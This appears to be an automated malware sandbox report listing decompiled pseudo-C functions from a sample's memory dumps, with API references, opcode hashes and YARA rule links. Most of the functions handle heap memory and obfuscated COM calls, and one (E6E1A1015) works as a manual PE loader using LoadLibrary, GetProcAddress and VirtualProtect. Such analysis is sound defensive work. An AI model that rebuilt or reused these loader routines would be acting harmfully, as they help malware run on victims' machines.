Opcode ID: bde1436f1f1087641f7424891703aaefc5698e937f52e8545b828c1fbc1d41e5
Instruction ID: 0a62af2164c4df2f989a10de4163b96f1448bf22d666f1780ba442f4d90f6779
Opcode Fuzzy Hash: bde1436f1f1087641f7424891703aaefc5698e937f52e8545b828c1fbc1d41e5
Instruction Fuzzy Hash: 4CF09676110208BFE7115F50DC85FAB7BBCEB45795F108086FD0696150D7709A84C770

Uniqueness

Uniqueness Score: -1.00%

Function 00B01C11, Relevance: 3.8, APIs: 3, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B01C11(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E00B075F6(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0xb0d310, 0x110);
					_t27 =  *0xb0d314; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E00B09182(0x110, _a4, _a4, _t27, 0);
					}
					if(E00B04BF7( &_v36) != 0 && E00B05E74(0x110, _a4,  &_v20,  &_v12,  &_v36, 0) == 0) {
						_t55 = _v20;
						_v36 =  *_t46;
						_t38 = E00B016D9(_t55, _a8, _t51, _t46, _a12); // executed
						_v16 = _t38;
						 *(_t55 + 4) = _v36;
						_t20 =  &(_t46[4]); // 0x8b4875c6
						memset(_t55, 0, _v12 - ( *_t20 & 0xf));
						_t57 = _t57 + 0xc;
						E00B04AAB(_t55);
					}
					memset(_a4, 0, _t53);
					E00B04AAB(_a4);
				}
				return _v16;
			}

0x00b01c17
0x00b01c1c
0x00b01c29
0x00b01c2c
0x00b01c2f
0x00b01c34
0x00b01c39
0x00b01c47
0x00b01c4c
0x00b01c51
0x00b01c56
0x00b01c58
0x00b01c61
0x00b01c61
0x00b01c70
0x00b01c93
0x00b01c99
0x00b01c9f
0x00b01ca7
0x00b01cad
0x00b01cb0
0x00b01cbd
0x00b01cc2
0x00b01cc6
0x00b01cc6
0x00b01cd1
0x00b01cdc
0x00b01cdc
0x00b01ce8

APIs

Part of subcall function 00B075F6: RtlAllocateHeap.NTDLL(00000000,00000000,00B04F70), ref: 00B07602

memcpy.NTDLL(00000000,00000110,00000002,00000002,00B0553A,00000008,00B0553A,00B0553A,?,00B05805,00B0553A), ref: 00B01C47
memset.NTDLL ref: 00B01CBD
memset.NTDLL ref: 00B01CD1

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$AllocateHeapmemcpy
String ID:
API String ID: 1529149438-0
Opcode ID: 1f139460a66d05ce06eda2326304760c93c288c88aff37687cb97837ecb67b2e
Instruction ID: f1bcf27543822b610bfcbf00462b81428fd1ff3225f958f9463949ec01c00b2a
Opcode Fuzzy Hash: 1f139460a66d05ce06eda2326304760c93c288c88aff37687cb97837ecb67b2e
Instruction Fuzzy Hash: 68211D75A00518ABDB11AB99CC41FEFBFF8EF48740F044495F905EA291E734DA118BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B04AC0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00B04AC0(void* __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E00B034F6(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0xb0d2e0; // 0xdca5a8
						_t9 = _t17 + 0xb0ea3c; // 0x444f4340
						_t20 = E00B05BA4( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0xb0d270, 0, _a4); // executed
					}
				}
				return _t26;
			}

0x00b04ac3
0x00b04ac9
0x00b04b20
0x00b04acf
0x00b04ada
0x00b04adf
0x00b04ae3
0x00b04af0
0x00b04af8
0x00b04b04
0x00b04b0c
0x00b04b16
0x00b04b16
0x00b04ae3
0x00b04b25

APIs

Part of subcall function 00B034F6: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00B0350E

Part of subcall function 00B05BA4: lstrlen.KERNEL32(74E5F710,?,00000000,?,74E5F710), ref: 00B05BD8
Part of subcall function 00B05BA4: StrStrA.SHLWAPI(00000000,?), ref: 00B05BE5
Part of subcall function 00B05BA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B05C04

RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00B039C8), ref: 00B04B16

Strings

Ut, xrefs: 00B04B16

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Allocate$Freelstrlen
String ID: Ut
API String ID: 2220322926-8415677
Opcode ID: 0adbb9d6eddc6627df5abf74de3cbad843308ac405d46698ec7bca4786534933
Instruction ID: 0da56a946ef796da9b26cb64c8b345d2627996269b590640ba44cb499bb88176
Opcode Fuzzy Hash: 0adbb9d6eddc6627df5abf74de3cbad843308ac405d46698ec7bca4786534933
Instruction Fuzzy Hash: 79016D76200108FFCB218F98CD41FAABBE9EB54750F1040A9FA05961B0EB71EA05DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B04AAB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B04AAB(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0xb0d270, 0, _a4); // executed
				return _t2;
			}

0x00b04ab7
0x00b04abd

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00B05012,00000000,?,?,00000000), ref: 00B04AB7

Strings

Ut, xrefs: 00B04AB7

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID: Ut
API String ID: 3298025750-8415677
Opcode ID: 4d57f86531f0cfa91a11e8f1473cd33502475090af7a58b636fa1990d1ad0616
Instruction ID: 8ec86eb9d42c5c813c965e5c90f94e400c2798181976d3f85b9d71d369c117ce
Opcode Fuzzy Hash: 4d57f86531f0cfa91a11e8f1473cd33502475090af7a58b636fa1990d1ad0616
Instruction Fuzzy Hash: 3FB012B1100100EBCE214B90DF04F05BE31B770700F009011B304010B0CB314420FF15

Uniqueness

Uniqueness Score: -1.00%

Function 00B0A6A0, Relevance: 3.1, APIs: 2, Instructions: 149
serviceCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00B0A6A0(intOrPtr _a4) {
				void* _v12;
				char _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				short _t73;
				intOrPtr* _t74;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t82;
				char* _t98;
				intOrPtr _t100;
				void* _t106;
				void* _t108;
				intOrPtr _t112;

				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0xb0d2e0; // 0xdca5a8
				_t4 = _t49 + 0xb0e44c; // 0x18d89f4
				_t82 = 0;
				_t5 = _t49 + 0xb0e43c; // 0x9ba05972
				_t51 =  *0xb0d124(_t5, 0, 4, _t4,  &_v20); // executed
				_t106 = _t51;
				if(_t106 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t98 =  &_v48;
					_push(_t98);
					_push(_t98);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0xb0d2e0; // 0xdca5a8
						_t30 = _t56 + 0xb0e42c; // 0x18d89d4
						_t31 = _t56 + 0xb0e45c; // 0x4c96be40
						_t58 =  *0xb0d0f0(_v12, _t31, _t30,  &_v24); // executed
						_t106 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t106 >= 0) {
							_t112 = _v16;
							if(_t112 == 0) {
								_t106 = 0x80004005;
								goto L11;
							} else {
								if(_t112 <= 0) {
									L11:
									if(_t106 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = 3;
										_v48 = _t73;
										_t74 = _v20;
										_v40 = _t82;
										_t108 = _t108 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12);
										if(_t106 < 0) {
											goto L7;
										} else {
											_t77 =  *0xb0d2e0; // 0xdca5a8
											_t23 = _t77 + 0xb0e42c; // 0x18d89d4
											_t24 = _t77 + 0xb0e45c; // 0x4c96be40
											_t106 =  *0xb0d0f0(_v12, _t24, _t23,  &_v24);
											_t80 = _v12;
											 *((intOrPtr*)( *_t80 + 8))(_t80);
											if(_t106 >= 0) {
												L12:
												_t63 = _v24;
												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t106 >= 0) {
													_t100 =  *0xb0d2e0; // 0xdca5a8
													_t67 = _v28;
													_t40 = _t100 + 0xb0e41c; // 0x214e3
													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t82 = _t82 + 1;
									} while (_t82 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t106;
			}

0x00b0a6ab
0x00b0a6b2
0x00b0a6b3
0x00b0a6b4
0x00b0a6b5
0x00b0a6bb
0x00b0a6c0
0x00b0a6c9
0x00b0a6cc
0x00b0a6d3
0x00b0a6d9
0x00b0a6dd
0x00b0a6e3
0x00b0a6eb
0x00b0a6ec
0x00b0a6f1
0x00b0a6f2
0x00b0a6f4
0x00b0a6f7
0x00b0a6f8
0x00b0a6f9
0x00b0a6ff
0x00b0a795
0x00b0a79a
0x00b0a7a1
0x00b0a7ab
0x00b0a7b1
0x00b0a7b3
0x00b0a7b9
0x00000000
0x00b0a705
0x00b0a705
0x00b0a70c
0x00b0a715
0x00b0a719
0x00b0a71f
0x00b0a722
0x00b0a78a
0x00000000
0x00b0a724
0x00b0a724
0x00b0a7bc
0x00b0a7be
0x00000000
0x00000000
0x00b0a72a
0x00b0a72a
0x00b0a72c
0x00b0a731
0x00b0a735
0x00b0a738
0x00b0a73d
0x00b0a745
0x00b0a746
0x00b0a747
0x00b0a749
0x00b0a74d
0x00b0a751
0x00000000
0x00b0a753
0x00b0a757
0x00b0a75c
0x00b0a763
0x00b0a773
0x00b0a775
0x00b0a77b
0x00b0a780
0x00b0a7c0
0x00b0a7c0
0x00b0a7cd
0x00b0a7d1
0x00b0a7d6
0x00b0a7dc
0x00b0a7e1
0x00b0a7eb
0x00b0a7ed
0x00b0a7f3
0x00b0a7f3
0x00b0a7f6
0x00b0a7fc
0x00000000
0x00000000
0x00000000
0x00b0a780
0x00000000
0x00b0a782
0x00b0a782
0x00b0a783
0x00000000
0x00b0a788
0x00b0a724
0x00b0a722
0x00b0a719
0x00b0a7ff
0x00b0a7ff
0x00b0a805
0x00b0a805
0x00b0a80e

APIs

IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,018D89D4,00B01ACA,?,?,?,?,?,?,?,?,?,?,?,00B01ACA), ref: 00B0A76D
IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,018D89D4,00B01ACA,?,?,?,?,?,?,?,00B01ACA,00000000,00000000,00000000,006D0063), ref: 00B0A7AB

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryServiceUnknown_
String ID:
API String ID: 2042360610-0
Opcode ID: bd4511a5dbad69e063f056b1766930310fdd828be9423a5559efb7e1e66ca4ec
Instruction ID: 5b3cdc94000910d2f5739725abc15586759760a820bb65fc6a5fcc019953cc51
Opcode Fuzzy Hash: bd4511a5dbad69e063f056b1766930310fdd828be9423a5559efb7e1e66ca4ec
Instruction Fuzzy Hash: 80514075D00219AFCB00DFE8C888DAEB7B8FF48710B158999E915EB250DB71AD45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B0144D, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00B0144D(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00B03DA0(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xb0d2e0; // 0xdca5a8
						_t20 = _t68 + 0xb0e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00B047EB(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x00b01453
0x00b01456
0x00b01466
0x00b0146f
0x00b01473
0x00b01541
0x00b01547
0x00b01547
0x00b0148d
0x00b01492
0x00b01496
0x00b0149c
0x00b014a1
0x00b014a8
0x00b014b7
0x00b014b7
0x00b014bb
0x00b014bd
0x00b014c9
0x00b014d4
0x00b014df
0x00b014e3
0x00b014ed
0x00b014f1
0x00b014f3
0x00b014f8
0x00b014ff
0x00b0150f
0x00b0150f
0x00b014f8
0x00b014f1
0x00b01511
0x00b01516
0x00b0151b
0x00b0151b
0x00b0151e
0x00b01527
0x00b0152c
0x00b0152c
0x00b01531
0x00b01536
0x00b01536
0x00b01531
0x00b014bb
0x00b01538
0x00b0153e
0x00000000

APIs

Part of subcall function 00B03DA0: SysAllocString.OLEAUT32(80000002), ref: 00B03DFD
Part of subcall function 00B03DA0: SysFreeString.OLEAUT32(00000000), ref: 00B03E63

SysFreeString.OLEAUT32(?), ref: 00B0152C
SysFreeString.OLEAUT32(00B028D9), ref: 00B01536

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: c9895a0fa120d008934c4331261207336cc3e12de79c53b579e392b6fb25567c
Instruction ID: 1574680c91f2271e3981de981edcfe72c7c4671e4de0034ef7297273c79ebbc9
Opcode Fuzzy Hash: c9895a0fa120d008934c4331261207336cc3e12de79c53b579e392b6fb25567c
Instruction Fuzzy Hash: DA314876500119AFCB15DFA8CC88C9BBBB9FBD97407144A98F9069B260E731ED51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1015, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E1A1015(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6e1a41c0;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1a41c0 - 0x69b24f45 &  !( *0x6e1a41c0 - 0x69b24f45);
				_t18 = E6E1A19C2( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1a41c0 - 0x69b24f45 &  !( *0x6e1a41c0 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1a41c0 - 0x69b24f45 &  !( *0x6e1a41c0 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6E1A1798(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6E1A1DE5(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6E1A12B5(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6E1A1397(_t42);
					L8:
					return _t29;
				}
			}

0x6e1a101d
0x6e1a101f
0x6e1a103b
0x6e1a104c
0x6e1a1053
0x6e1a10b1
0x00000000
0x6e1a1055
0x6e1a1055
0x6e1a105f
0x6e1a1063
0x6e1a1068
0x6e1a106b
0x6e1a1070
0x6e1a1074
0x6e1a1079
0x6e1a107e
0x6e1a1082
0x6e1a1087
0x6e1a1088
0x6e1a108c
0x6e1a1091
0x6e1a1099
0x6e1a1099
0x6e1a1091
0x6e1a1082
0x6e1a1074
0x6e1a109b
0x6e1a10a4
0x6e1a10a8
0x6e1a10b2
0x6e1a10b8
0x6e1a10b8

APIs

Part of subcall function 6E1A19C2: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E1A1051,?,?,?,?), ref: 6E1A19E6
Part of subcall function 6E1A19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E1A1A08
Part of subcall function 6E1A19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E1A1A1E
Part of subcall function 6E1A19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E1A1A34
Part of subcall function 6E1A19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E1A1A4A
Part of subcall function 6E1A19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E1A1A60

Part of subcall function 6E1A1798: memcpy.NTDLL(?,?,?,?,?,?,?,?,6E1A105F,?,?,?,?,?,?), ref: 6E1A17CF
Part of subcall function 6E1A1798: memcpy.NTDLL(?,?,?), ref: 6E1A1804

Part of subcall function 6E1A1DE5: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E1A1E1D

Part of subcall function 6E1A12B5: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?), ref: 6E1A12EE
Part of subcall function 6E1A12B5: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1A1363
Part of subcall function 6E1A12B5: GetLastError.KERNEL32 ref: 6E1A1369

GetLastError.KERNEL32(?,?,?,?,?), ref: 6E1A1093

Strings

@Mt MtTt, xrefs: 6E1A1093

Memory Dump Source

Source File: 00000000.00000002.823219799.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.823180575.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823258279.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823310393.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.823345888.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID: @Mt MtTt
API String ID: 2673762927-608512568
Opcode ID: 937e7c8d1240b9a073f758f6126bbf65a2e58fe269217b8e637dacfdd3391889
Instruction ID: 4b396187795c1a835ea219ab24937bfc4904020b2d9aefb792e329228353502a
Opcode Fuzzy Hash: 937e7c8d1240b9a073f758f6126bbf65a2e58fe269217b8e637dacfdd3391889
Instruction Fuzzy Hash: 2A11E9BA7007016BC3219AED8D94DBF77BDAF893147004919EB42D7500DB61ED499790

Uniqueness

Uniqueness Score: -1.00%

Function 00B039D5, Relevance: 3.1, APIs: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00B039D5(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0xb0d2e0; // 0xdca5a8
				_t2 = _t42 + 0xb0e46c; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0xb0d2e0; // 0xdca5a8
					_t6 = _t45 + 0xb0e48c; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0xb0d2e0; // 0xdca5a8
							_t30 = _v8;
							_t12 = _t48 + 0xb0e47c; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}

0x00b039e1
0x00b039e2
0x00b039e8
0x00b039ef
0x00b039f1
0x00b039f5
0x00b039f9
0x00b039fb
0x00b03a04
0x00b03a0a
0x00b03a12
0x00b03a14
0x00b03a18
0x00b03a1a
0x00b03a27
0x00b03a2b
0x00b03a30
0x00b03a36
0x00b03a3b
0x00b03a43
0x00b03a45
0x00b03a47
0x00b03a4d
0x00b03a4d
0x00b03a50
0x00b03a56
0x00b03a56
0x00b03a59
0x00b03a5f
0x00b03a5f
0x00b03a66

APIs

IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 00B03A12
IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 00B03A43

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: Interface_ProxyQueryUnknown_
String ID:
API String ID: 2522245112-0
Opcode ID: bf94a2dd35ccb65ded6d6862dedfe6a9f838d2ac6028184c71721cde708d77d3
Instruction ID: 843ba2ee0fd53f5a09574b043aacae4ecdc68ce34faea84305d80e54f8827989
Opcode Fuzzy Hash: bf94a2dd35ccb65ded6d6862dedfe6a9f838d2ac6028184c71721cde708d77d3
Instruction Fuzzy Hash: 63211275A00619EFCB00DBA4C888D5EF7B9FF88704B148688E946EB354D771EE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A10B9, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A10B9() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x6e1a41c4;
				if( *0x6e1a41ac > 5) {
					_t16 = _t15 + 0x6e1a50f9;
				} else {
					_t16 = _t15 + 0x6e1a50b1;
				}
				E6E1A15A0(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E6E1A1EF0( &_v32,  &_v16,  *0x6e1a41c0 ^ 0xf7a71548) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x6e1a41b8);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E6E1A1172(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x6e1a41b8 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E6E1A2070(_t44, _t32 + 4);
						}
					}
					_t25 = E6E1A1015(_v28); // executed
				}
				ExitThread(_t25);
			}

0x6e1a10bf
0x6e1a10d0
0x6e1a10da
0x6e1a10d2
0x6e1a10d2
0x6e1a10d2
0x6e1a10e1
0x6e1a10ea
0x6e1a10ef
0x6e1a110d
0x6e1a1169
0x6e1a110f
0x6e1a1115
0x6e1a111b
0x6e1a1129
0x6e1a112d
0x6e1a1134
0x6e1a113d
0x6e1a1141
0x6e1a1147
0x6e1a1158
0x6e1a1149
0x6e1a114f
0x6e1a114f
0x6e1a1147
0x6e1a1160
0x6e1a1160
0x6e1a116b

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 6E1A1115
ExitThread.KERNEL32 ref: 6E1A116B

Memory Dump Source

Source File: 00000000.00000002.823219799.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.823180575.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823258279.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823310393.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.823345888.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

